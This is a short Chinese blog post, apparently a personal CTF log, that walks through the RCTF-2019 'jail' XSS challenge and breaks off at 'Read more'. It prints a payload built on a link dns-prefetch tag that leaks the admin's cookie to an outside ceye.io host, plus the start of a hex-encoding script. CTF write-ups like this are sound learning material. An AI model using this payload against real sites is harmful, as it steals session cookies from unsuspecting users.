XSS 的一些做题记录

xss太菜了,只能记录一下做题,只想到这种办法来提升自己,从现在开始记录 RCTF-2019 jail 进去之后注册登录 url:https://jail.2019.rctf.rois.io/ post message url:https://jail.2019.rctf.rois.io/?action=feedback 向服务器提交message对应的id,然后管理员会查看 https://jail.2019.rctf.rois.io/ 删除所有message https://jail.2019.rctf.rois.io/?action=profile 个人信息界面可以上传图片更换头像 profile界面传php都会被转jpg,而且明显就是xss题目,message界面是不给x的 没思路,看了pakho师傅的wp才知道,先头像上传js,再post message时传入要xss payload,然后将id传给admin访问 并且cookie有两个hint 禁掉了meta的跳转,师傅用了link标签的预加载 https://blog.csdn.net/qq_31481187/article/details/53027208 构造 <link rel=”dns-prefetch” href=”//[cookie].xxx.ceye.io”> payload 2.js function Strtohex(Things){ var str = ”; for (var i = 0; i < Things.length ; i++) { str += Things[i].charCodeAt(0).toString(16); } return str; } Read more…